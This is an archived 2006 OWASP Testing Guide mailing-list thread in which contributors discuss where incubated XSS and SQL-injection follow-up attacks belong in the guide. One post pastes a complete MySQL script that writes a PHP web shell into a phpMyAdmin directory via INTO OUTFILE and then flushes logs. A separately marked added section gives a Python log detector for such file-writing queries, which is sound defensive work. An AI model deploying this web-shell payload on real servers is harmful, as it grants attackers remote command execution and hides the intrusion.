[Owasp-testing] Brainstorming about the new Index

Ariel Waissbein wata.34mt at coresecurity.com
Thu Oct 12 17:37:19 EDT 2006


You are right. It is a simple XSS incubated attack.

But on the other hand, now that I continue to think about it... What
about using a SQL-injection vulnerability to upload code to the Db, and
then, if the server has shell enabled, using this to execute the code?
(I Googled an example of something like this for attacking PHP's PMA,
which I copy below.)

The point is that if the pentester discovers a SQL-injection, he might
be able to do a lot of things. It appears that the SQL-injection gives
the pentester a new /asset/ (the ability to make certain queries to
certain tables in the Db). After that, with all the information he has
gathered so far, the pen tester will decide what to do. Probably, he
will want to research the implications of the SQL-injection
vulnerability. Colleague Gerardo Richarte has proposed this methodology
(see, e.g., slides from his PacSec Japan 2003 talk) over the traditional
(IG, Attack, Penetrate and Report) approach.

Moreover, sometimes during a pen test it isn't just enough to discover a
SQL-injection. You need to prove the impact of this vulnerability to
developers that think it is inoffensive and shouldn't be fixed.

Then my question is: should we include a prelude on pen testing
methodology before 4.1? Then, in accordance with Matt's suggestion,
should each section (e.g., XSS incubated attacks) include a subsection
where all the attacks assume that condition X holds (where X is that some
sort of SQL-injection vulnerability was found, or such permissions are
badly set, et cetera)? I think this might be beneficial to the readers.

Ariel

--

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values
('<? $cmd = $_REQUEST["-cmd"]; ?>
<html>
<head><title>help.php</title></head>
<onLoad="document.forms[0].elements[-cmd].focus()">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
<hr>
<pre>
	<? if($cmd != "") print Shell_Exec($cmd); ?>
</pre>
</form>
</body>
</html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
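Since the pasted script needs the MySQL FILE privilege and leaves a distinctive INTO OUTFILE statement in the general query log, a defender can hunt for exactly that. The following is an added example (not part of this thread or of the OWASP guide) in Python: it parses general_log style lines and flags the file-reaching constructs (INTO OUTFILE, INTO DUMPFILE, LOAD_FILE(), LOAD DATA) after normalising away comment and case tricks; the log lines, connection ids and paths below are constructed, not captured from a real server.

```python
import re
from typing import List, Tuple

# Constructed sample lines in MySQL general_log (FILE output) style:
# "<time>\t<connection id> <command>\t<argument>". Not from a real server.
SAMPLE_LOG = """\
2006-10-12T21:37:19.000000Z\t   42 Query\tuse mysql
2006-10-12T21:37:19.000000Z\t   42 Query\tCREATE TABLE temptab (codetab text)
2006-10-12T21:37:20.000000Z\t   42 Query\tSELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab
2006-10-12T21:37:21.000000Z\t   43 Query\tSELECT id, name FROM users WHERE id = 7
2006-10-12T21:37:22.000000Z\t   44 Query\tselect 1 into/**/DumpFile '/tmp/notes.txt' -- comment
2006-10-12T21:37:23.000000Z\t   45 Query\tSELECT LOAD_FILE('/tmp/notes.txt')
2006-10-12T21:37:24.000000Z\t   46 Connect\tapp@localhost on shop
"""

LOG_LINE = re.compile(r"^(?P<time>\S+)\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# SQL constructs that reach the server's file system; all require the FILE privilege.
FILE_OPS = {
    "into outfile": r"\binto\s+outfile\b",
    "into dumpfile": r"\binto\s+dumpfile\b",
    "load_file()": r"\bload_file\s*\(",
    "load data": r"\bload\s+data\b",
}

def normalize_sql(sql: str) -> str:
    """Lowercase and strip comments/whitespace so 'INTO/**/OUTFILE' and
    'into   outfile' both become 'into outfile'. Comment markers inside string
    literals are also stripped; for detection that over-approximation is fine."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)     # /* ... */ comments
    sql = re.sub(r"(--\s|#).*$", " ", sql, flags=re.M)  # -- and # line comments
    return re.sub(r"\s+", " ", sql).strip().lower()

def find_file_ops(log_text: str) -> List[Tuple[str, str]]:
    """Return (connection id, construct) for every Query line that touches files."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        sql = normalize_sql(m.group("arg"))
        for name, pattern in FILE_OPS.items():
            if re.search(pattern, sql):
                hits.append((m.group("conn"), name))
    return hits

if __name__ == "__main__":
    for conn, op in find_file_ops(SAMPLE_LOG):
        print(f"connection {conn}: {op}")
```

Any hit from an application account is worth an alert, since a web application's DB user normally has no business writing or reading server files at all.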

Matteo Meucci wrote:
> Yes,
> I think you are right: this paragraph already exists.
> look at:
> (http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents)
> 4.6 Data Validation Testing 0% TD
> 4.6.1 Cross site scripting 0% TD
> 4.6.1.1 Incubated attacks 0% TD
> 
> Ariel maybe says that Incubated attacks are a combination of SQL Inj
> and XSS, but we can reasonably affirm that it is a particular XSS attack.
> In the same paragraph we can show an example of how an XSS Inc Attack
> works exploiting an SQL Inj vulnerability.
> Right?
> 
> Mat
> 
> 
> 
> On 10/12/06, Eoin <eoinkeary at gmail.com> wrote:
>> Hi,
>> incubated attacks are important enough to warrant a section under XSS.
>> It is another variant of XSS.
>> Matteo, what do you think?
>>
>>
>>
>> On 11/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
>> > Hi all,
>> >
>> > my first post and 2 cents here:
>> >
>> > I guess we should make a difference between the techniques of unit
>> > testing and the results of UT. Even if UT can be used to... e.g.,
>> > discover BO or SQL-injection vulns.
>> >
>> > Although, I noticed that there is an Appendix for fuzzing which is
>> > another technique for discovering (some) vulnerabilities.
>> >
>> >
>> > A new question: imagine the following situation: The pen tester
>> > discovers a SQL-injection vulnerability in a webapp he is auditing. This
>> > vuln. allows him to store some javascript in the Db and therefore
>> > perpetrate a XSS attack (incubated) on the users of this webapp.  My
>> > question is where do we describe these attacks? (I think they are
>> > important enough to be included somewhere.)
>> >
>> > Cheers,
>> > Ariel
>> >
>> > Eoin Keary wrote:
>> > > Hi,
>> > >
>> > > Question:
>> > > Do we want to get into Unit Testing and SDLC methodology in this guide?
>> > > I thought they would be more suited to Andrew's dev guide or the code
>> > > review project.
>> > > Unit testing is related to testing small blocks of a system
>> > > individually and hence a development phase done prior to system and
>> > > integration testing.
>> > > The Guide currently focuses on penetration testing which is "After the
>> > > Fact" testing and not really done until the system is developed.
>> > >
>> > > What y'all think?
>> > >
>> > > Eoin
>> > >
>> > _______________________________________________
>> > Owasp-testing mailing list
>> > Owasp-testing at lists.owasp.org
>> > http://lists.owasp.org/mailman/listinfo/owasp-testing
>> >
>>
>>
>>
>> -- 
>> Eoin Keary OWASP - Ireland
>> http://www.owasp.org/local/ireland.html
>>  http://www.owasp.org/index.php/OWASP_Testing_Project
>> http://www.owasp.org/index.php/OWASP_Code_Review_Project